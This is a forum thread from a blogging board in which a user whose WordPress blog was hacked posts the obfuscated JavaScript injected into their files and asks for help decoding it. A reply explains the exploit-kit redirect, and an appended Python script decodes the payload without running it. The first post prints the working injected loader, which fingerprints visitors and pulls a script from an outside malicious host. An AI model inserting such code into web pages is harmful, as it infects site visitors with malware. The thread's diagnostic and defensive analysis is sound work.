
My blog got hacked, help with decoding

Discussion in 'Blogging' started by prozium, May 9, 2009.

  1. prozium

    prozium Newbie

    Joined:
    Mar 31, 2009
    Messages:
    48
    Likes Received:
    12
    Hi there, this is my first thread here and I didn't want it to be something like this, but we can't get what we want ....
    So to the point - my blog (WordPress 2.5) got hacked, it was my hoster's fault. All my .php/.js/.xml files got edited (well, not all of them, but most of them); the editing of ALL the files (in all folders - admin, plugins, themes and so on...) took 2-3 minutes, so I'm assuming that he used a script of some kind.
    This code was inserted in most of the .php/.js/.xml files

    Code:
    </head><script language=javascript><!-- 
    (function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);
     --></script>
    <body>
    It's some kind of redirecting script, that redirects to something (adware/spyware/virii), still not sure what. If there is someone who can help me decode it and understand what it is doing, I will really appreciate any help.

    I can provide the php, that includes this code too if necessary.
     
  2. sidddd

    sidddd Power Member

    Joined:
    May 15, 2008
    Messages:
    749
    Likes Received:
    461
    Sucks, man.. download the exploit scanner plugin and scan your blog.. it will show the suspicious pages and provides a few instructions on how to remove the codes..

    My blog was hacked and this plugin helped me find that malicious code.. also Google marked the blog as SITE IS HARMFUL.. so better do this RIGHT NOW...
     
  3. prozium

    prozium Newbie

    Joined:
    Mar 31, 2009
    Messages:
    48
    Likes Received:
    12
    First thing I did was to take the blog down; it was exposed only 3 hours. Thanks for the advice, I will scan it with the plugin, but first the hoster must figure out how his server got hacked. I want to decode the JS so I can find out who is doing this and what's the spin here.
     
  4. Ca$HHazard

    Ca$HHazard BANNED BANNED

    Joined:
    Feb 11, 2009
    Messages:
    171
    Likes Received:
    41
    The JavaScript injection on your pages is an obfuscated iframe. Any user sent to your blog will be silently (and invisibly) redirected to an exploit kit. The kit will try to inject shellcode onto the visitor, and thus infect them.

    Could be a banking trojan, a standard bot for a botnet or some other random viri.

    You have an un-updated script that was in your shared hosting public html directory. Unless you remove whatever is outdated and exploitable, it will continue to be infected, via remote file inclusion or a SQL injection.

    All of the .php and/or .html files were done in a second via a simple-to-make Perl script. They had shell access to your site, probably a standard c99 or r57, it doesn't matter.

    Your AV was firing detections not at the viri it attempted to land on your box, but at the recognizable shellcode.
    You don't really have to worry, they're most likely scriptkiddies considering it's REALLY easy to UD an exploit kit. Just get rid of the vulnerable script and you'll be fine.
     
    Last edited: May 9, 2009
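An added example, not posted by anyone in this thread: a small Python script that statically decodes the injected stage from the first post without ever executing it. The loader only does `unescape(payload.replace(/:/g, '%'))` and then `eval()`s the result, so the same transformation can be replayed offline to read what the stage checks and where it loads its next script from. `js_unescape` is my reimplementation of JavaScript's `unescape()`; the other function and variable names are my own.

```python
import re
from typing import List, Optional

# Sample input: the one-line injected script quoted in the first post (the
# surrounding </head>, <!-- --> and <body> are left off; they play no part).
INJECTED = r"""(function(m9RlI){var HAspt='%';var UoQSJ=unescape(('var:20a:3d:22Scr:69p:74:45n:67ine:22:2cb:3d:22Versi:6fn:28)+:22:2cj:3d:22:22:2cu:3dnav:69ga:74or:2e:75serAg:65:6et:3bif((u:2eind:65xOf(:22W:69n:22):3e0):26:26:28:75:2eindexOf(:22:4eT:206:22):3c0):26:26(doc:75ment:2ecoo:6bie:2eind:65x:4ff:28:22:6d:69e:6b:3d1:22):3c:30):26:26(typ:65of(zr:76zts:29:21:3dtypeof(:22A:22:29):29:7b:7arvzts:3d:22A:22:3be:76al(:22if(win:64o:77:2e:22+a:2b:22)j:3dj+:22+:61+:22Major:22+b+a+:22Min:6fr:22+b:2ba+:22Build:22+b:2b:22j:3b:22):3bdo:63ument:2ewrite(:22:3c:73cri:70t:20s:72c:3d:2f:2fgu:6dblar:2ec:6e:2frs:73:2f:3f:69:64:3d:22+j+:22:3e:3c:5c:2fsc:72ipt:3e:22):3b:7d').replace(m9RlI,HAspt));eval(UoQSJ)})(/:/g);"""

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s: str) -> str:
    """Static equivalent of JavaScript's unescape(): %XX and %uXXXX become characters."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(snippet: str) -> str:
    """Undo the unescape(payload.replace(/sep/g, repl)) stage without running it.

    The loader hides the '%' in a local var and passes the separator regex as
    the IIFE argument, so all three pieces are pulled out with regexes and the
    transformation is replayed in Python instead of being handed to eval().
    """
    repl = re.search(r"var\s+\w+\s*=\s*'([^']*)'", snippet).group(1)   # '%'
    sep = re.search(r"\}\)\(/(.)/g\)", snippet).group(1)                # ':'
    payload = re.search(r"unescape\(\('([^']*)'\)\.replace", snippet).group(1)
    return js_unescape(payload.replace(sep, repl))


def remote_script_src(decoded: str) -> Optional[str]:
    """Return the src of the <script> tag the decoded stage document.write()s, if any."""
    m = re.search(r"""<script\s+src=([^\s"'>]+)""", decoded)
    return m.group(1) if m else None


def fingerprint_checks(decoded: str) -> List[str]:
    """List the literals the stage tests with indexOf() before firing: the
    user-agent and cookie gates that decide which visitors get the next stage."""
    return re.findall(r'indexOf\("([^"]*)"\)', decoded)


if __name__ == "__main__":
    stage = deobfuscate(INJECTED)
    print(stage)                                    # readable second stage
    print("remote loader:", remote_script_src(stage))   # URL to block/report
    print("victim gates :", fingerprint_checks(stage))  # who it targets
```

The decoded stage shows the script only fires on Windows browsers that are not NT 6, skips visitors carrying a marker cookie, and passes the ScriptEngine version (an IE-only property) to the remote loader as its `id` parameter.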